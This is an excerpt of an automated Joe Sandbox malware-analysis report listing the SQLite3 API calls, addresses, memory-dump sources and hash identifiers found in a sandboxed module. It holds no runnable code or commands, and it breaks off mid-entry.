                                                                          • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                                          • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                                          • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                                          • sqlite3_step.SQLITE3 ref: 6096A969
                                                                          • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                                          • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                                            • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                            • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                            • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                          • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                                          • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                                          • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                                          • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                                          • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                                          • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                                          • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                                          • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                                          • String ID: optimize
                                                                          • API String ID: 1540667495-3797040228
                                                                          • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                          • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                                          • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                          • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
APIs
• sqlite3_finalize.SQLITE3 ref: 60966178
• sqlite3_free.SQLITE3 ref: 60966183
• sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
• sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
• sqlite3_value_text.SQLITE3 ref: 60966236
• sqlite3_value_int.SQLITE3 ref: 60966274
• memcmp.MSVCRT ref: 6096639E
  • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
  • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
• sqlite3_mprintf.SQLITE3 ref: 60966B51
• sqlite3_mprintf.SQLITE3 ref: 60966B7D
  • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
  • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
Strings
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
• String ID: ASC$DESC$x
• API String ID: 4082667235-1162196452
APIs
• sqlite3_bind_int64.SQLITE3 ref: 6096882B
• sqlite3_bind_int.SQLITE3 ref: 60968842
• sqlite3_step.SQLITE3 ref: 6096884D
• sqlite3_reset.SQLITE3 ref: 60968858
• sqlite3_bind_int64.SQLITE3 ref: 60968907
• sqlite3_bind_int.SQLITE3 ref: 60968924
• sqlite3_step.SQLITE3 ref: 6096892F
• sqlite3_column_blob.SQLITE3 ref: 60968947
• sqlite3_column_bytes.SQLITE3 ref: 6096895C
• sqlite3_column_int64.SQLITE3 ref: 60968975
• sqlite3_reset.SQLITE3 ref: 609689B0
  • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
  • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
  • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
  • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
  • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
• sqlite3_free.SQLITE3 ref: 60968A68
• sqlite3_bind_int64.SQLITE3 ref: 60968B00
• sqlite3_bind_int64.SQLITE3 ref: 60968B2D
• sqlite3_step.SQLITE3 ref: 60968B38
• sqlite3_reset.SQLITE3 ref: 60968B43
• sqlite3_bind_int64.SQLITE3 ref: 60968B9F
• sqlite3_bind_blob.SQLITE3 ref: 60968BC8
• sqlite3_bind_int64.SQLITE3 ref: 60968BEF
• sqlite3_bind_int.SQLITE3 ref: 60968C0C
• sqlite3_step.SQLITE3 ref: 60968C17
• sqlite3_reset.SQLITE3 ref: 60968C22
• sqlite3_free.SQLITE3 ref: 60968C2F
• sqlite3_free.SQLITE3 ref: 60968C3A
  • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164E9
  • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164F4
  • Part of subcall function 6095F772: sqlite3_bind_int64.SQLITE3 ref: 6095F7AC
  • Part of subcall function 6095F772: sqlite3_bind_blob.SQLITE3 ref: 6095F7D5
  • Part of subcall function 6095F772: sqlite3_step.SQLITE3 ref: 6095F7E0
  • Part of subcall function 6095F772: sqlite3_reset.SQLITE3 ref: 6095F7EB
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_bind_int64$sqlite3_free$sqlite3_resetsqlite3_step$sqlite3_bind_int$sqlite3_bind_blob$sqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_column_blobsqlite3_column_bytessqlite3_column_int64sqlite3_malloc
• String ID:
• API String ID: 2526640242-0
APIs
• sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
• sqlite3_step.SQLITE3(?,?), ref: 609693B0
• sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
  • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
  • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
  • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
  • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
• sqlite3_reset.SQLITE3(?,?), ref: 609693F3
• sqlite3_malloc.SQLITE3(?), ref: 60969561
• sqlite3_malloc.SQLITE3(?), ref: 6096958D
• sqlite3_step.SQLITE3(?), ref: 609695D2
• sqlite3_column_int64.SQLITE3(?), ref: 609695EA
• sqlite3_reset.SQLITE3(?), ref: 60969604
• sqlite3_realloc.SQLITE3(?), ref: 609697D0
• sqlite3_realloc.SQLITE3(?), ref: 609698A9
  • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
• sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
• sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
• sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
• sqlite3_step.SQLITE3(?,?), ref: 60969A75
• sqlite3_reset.SQLITE3(?,?), ref: 60969A80
• sqlite3_free.SQLITE3(?), ref: 60969D41
• sqlite3_free.SQLITE3(?), ref: 60969D4C
• sqlite3_free.SQLITE3(?), ref: 60969D5B
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
• String ID:
• API String ID: 961572588-0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
• String ID: 2$foreign key$indexed
• API String ID: 4126863092-702264400
APIs
• sqlite3_bind_int64.SQLITE3 ref: 6094A72B
• sqlite3_step.SQLITE3 ref: 6094A73C
• sqlite3_column_blob.SQLITE3 ref: 6094A760
• sqlite3_column_bytes.SQLITE3 ref: 6094A77C
• sqlite3_malloc.SQLITE3 ref: 6094A793
• sqlite3_reset.SQLITE3 ref: 6094A7F2
• sqlite3_free.SQLITE3(?), ref: 6094A87C
  • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
• String ID:
• API String ID: 2794791986-0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_stricmp
• String ID: USING COVERING INDEX $DISTINCT$ORDER BY
• API String ID: 912767213-1308749736
APIs
• sqlite3_bind_int64.SQLITE3 ref: 6094B488
• sqlite3_step.SQLITE3 ref: 6094B496
• sqlite3_reset.SQLITE3 ref: 6094B4A4
• sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
• sqlite3_step.SQLITE3 ref: 6094B4E0
• sqlite3_reset.SQLITE3 ref: 6094B4EE
  • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
• String ID:
• API String ID: 4082478743-0
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                          • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                          Strings
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
• String ID: BINARY$INTEGER
• API String ID: 317512412-1676293250
APIs
• sqlite3_bind_int64.SQLITE3 ref: 6094B582
• sqlite3_step.SQLITE3 ref: 6094B590
• sqlite3_column_int64.SQLITE3 ref: 6094B5AD
• sqlite3_reset.SQLITE3 ref: 6094B5EE
• memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
Similarity
• API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
• String ID:
• API String ID: 2802900177-0
APIs
• sqlite3_mutex_enter.SQLITE3 ref: 6093F443
  • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
• sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
  • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
  • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
• sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
• sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
Similarity
• API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
• String ID:
• API String ID: 4038589952-0
APIs
  • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
  • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
  • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
  • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
• sqlite3_bind_int64.SQLITE3 ref: 6094C719
• sqlite3_step.SQLITE3 ref: 6094C72A
• sqlite3_reset.SQLITE3 ref: 6094C73B
  • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
  • Part of subcall function 6094A9F5: sqlite3_free.SQLITE3(?,?,?,00000000,?,?,6094AC3F), ref: 6094AA7A
• sqlite3_free.SQLITE3 ref: 6094C881
Similarity
• API ID: sqlite3_bind_int64sqlite3_freesqlite3_resetsqlite3_step$memmovesqlite3_column_int64
• String ID:
• API String ID: 3487101843-0
APIs
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
• sqlite3_bind_int.SQLITE3 ref: 6096A3DE
  • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
• sqlite3_column_int.SQLITE3 ref: 6096A3F3
• sqlite3_step.SQLITE3 ref: 6096A435
• sqlite3_reset.SQLITE3 ref: 6096A445
Similarity
• API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
• String ID:
• API String ID: 247099642-0
APIs
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
• sqlite3_bind_int64.SQLITE3 ref: 6096A322
  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
• sqlite3_step.SQLITE3 ref: 6096A32D
• sqlite3_column_int.SQLITE3 ref: 6096A347
  • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
• sqlite3_reset.SQLITE3 ref: 6096A354
Similarity
• API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
• String ID:
• API String ID: 326482775-0
APIs
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
• sqlite3_bind_int64.SQLITE3 ref: 6095F83D
  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
• sqlite3_bind_int64.SQLITE3 ref: 6095F85E
• sqlite3_step.SQLITE3 ref: 6095F869
• sqlite3_reset.SQLITE3 ref: 6095F874
  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
Similarity
• API ID: sqlite3_bind_int64sqlite3_mutex_leave$sqlite3_freesqlite3_mprintfsqlite3_mutex_entersqlite3_prepare_v2sqlite3_resetsqlite3_step
• String ID:
• API String ID: 2747803115-0
APIs
• sqlite3_bind_int64.SQLITE3 ref: 6094B71E
  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
• sqlite3_bind_int64.SQLITE3 ref: 6094B73C
• sqlite3_step.SQLITE3 ref: 6094B74A
Similarity
• API ID: sqlite3_bind_int64$sqlite3_mutex_leavesqlite3_step
• String ID:
• API String ID: 3305529457-0
APIs
• sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
• sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave
• String ID:
• API String ID: 1477753154-0
                                                                          APIs
                                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1465156292-0
                                                                          • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                          • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                                          • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                          • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                                          APIs
                                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925769
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1465156292-0
                                                                          • Opcode ID: f78b12b45e858c7fd8cb74f5d211d4e30abbc68d4504511404b73e1b177a8d68
                                                                          • Instruction ID: d5dd20366bd30be5098f9e48471fbeb1ccf01997be5a2761bb4486817e6b3aba
                                                                          • Opcode Fuzzy Hash: f78b12b45e858c7fd8cb74f5d211d4e30abbc68d4504511404b73e1b177a8d68
                                                                          • Instruction Fuzzy Hash: 23F08171A10A28D7CB106F29EC8958EBBB9FF69254B055058ECC1A730CDB35D925C791
                                                                          APIs
                                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1465156292-0
                                                                          • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                          • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                          • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                          • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                          APIs
                                                                            • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1465156292-0
                                                                          • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                          • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
